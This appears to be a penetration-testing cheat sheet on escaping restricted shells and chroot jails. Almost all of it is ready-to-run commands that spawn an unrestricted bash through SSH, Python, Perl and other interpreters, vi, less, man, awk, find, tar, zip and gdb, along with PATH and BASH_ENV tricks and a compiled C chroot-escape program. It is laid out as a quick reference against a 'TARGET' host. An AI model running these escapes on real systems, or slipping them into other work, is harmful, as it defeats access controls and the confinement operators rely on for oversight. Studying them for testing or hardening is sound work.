Restricted Shell Escape

Identify Restricted Shell

echo $SHELL
echo $0
env

Common restricted shells:

Shell	Description
`rbash`	Restricted Bash — no cd, no PATH changes, no redirects
`rksh`	Restricted Korn Shell
`rzsh`	Restricted Zsh
`lshell`	Limited Shell (Python-based)

Typical Restrictions

Cannot cd
Cannot change PATH, SHELL, ENV
Cannot use / in commands
Cannot redirect output (>, >>)
Cannot use exec

Quick Escapes

SSH

Bypass rbash on login:

ssh user@TARGET -t "bash --noprofile"
ssh user@TARGET -t "/bin/bash"
ssh user@TARGET -t "sh"

Force pseudo-terminal with command:

ssh user@TARGET -t "/bin/sh"

Invoke Unrestricted Shell

bash
/bin/bash
/bin/sh
sh

If / blocked, use available commands:

cp /bin/bash .
./bash

Language Interpreters

Python

python3 -c 'import os; os.system("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'exec "/bin/bash";'

Ruby

ruby -e 'exec "/bin/bash"'

Lua

lua -e 'os.execute("/bin/bash")'

PHP

php -r 'system("/bin/bash");'

Node.js

node -e 'require("child_process").spawn("/bin/bash",{stdio:[0,1,2]})'

Editor Escapes

vi / vim

vi
:set shell=/bin/bash
:shell

Or:

vi
:!/bin/bash

ed

ed
!/bin/bash

nano

Ctrl+R → Ctrl+X → /bin/bash

less

less /etc/passwd
!/bin/bash

more /etc/passwd
!/bin/bash

man

man man
!/bin/bash

Program-specific Escapes

awk

awk 'BEGIN {system("/bin/bash")}'

find

find / -exec /bin/bash \;

nmap (old)

nmap --interactive
!sh

ftp

ftp
!/bin/bash

gdb

gdb -q
!bash

zip

zip /tmp/a.zip /tmp/a -T --unzip-command="sh -c /bin/bash"

tar

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

expect

expect -c 'spawn /bin/bash; interact'

tee

Write to files even when redirect blocked:

echo "data" | tee /tmp/output.txt

PATH Manipulation

If PATH is restricted but you can set variables:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

If export blocked:

BASH_CMDS[a]=/bin/bash
a
export PATH=$PATH:/bin:/usr/bin

Copy Trick

If cp is available:

cp /bin/bash /tmp/bash
/tmp/bash

Environment Variables

BASH_ENV

If BASH_ENV is not cleared:

export BASH_ENV=/tmp/payload.sh
# payload.sh contains: /bin/bash

ENV (for sh)

ENV=/tmp/payload.sh sh

lshell Escapes

lshell (Python-based limited shell) has known bypasses:

echo os.system('/bin/bash')

echo $(bash)

? () { /bin/bash; }; ?

Chroot Escape

If inside chroot jail with root:

#include <unistd.h>
#include <sys/stat.h>

int main() {
    mkdir("chroot_escape", 0755);
    chroot("chroot_escape");
    for (int i = 0; i < 100; i++) chdir("..");
    chroot(".");
    execl("/bin/bash", "bash", NULL);
}

gcc escape.c -o escape && ./escape

Quick Reference

Method	When
`ssh -t "/bin/bash"`	SSH access available
`python3 -c 'import pty...'`	Python available
`vi → :!/bin/bash`	vi/vim available
`less → !/bin/bash`	Pager available
`awk 'BEGIN {system(...)}'`	awk available
`BASH_CMDS[a]=/bin/bash; a`	Can set variables
`cp /bin/bash /tmp; /tmp/bash`	cp available

Documentation Index

​Identify Restricted Shell

​Typical Restrictions

​Quick Escapes

​SSH

​Invoke Unrestricted Shell

​Language Interpreters

​Python

​Perl

​Ruby

​Lua

​PHP

​Node.js

​Editor Escapes

​vi / vim

​ed

​nano

​Pager Escapes

​less

​more

​man

​Program-specific Escapes

​awk

​find

​nmap (old)

​ftp

​gdb

​zip

​tar

​expect

​tee

​PATH Manipulation

​Copy Trick

​Environment Variables

​BASH_ENV

​ENV (for sh)

​lshell Escapes

​Chroot Escape

​Quick Reference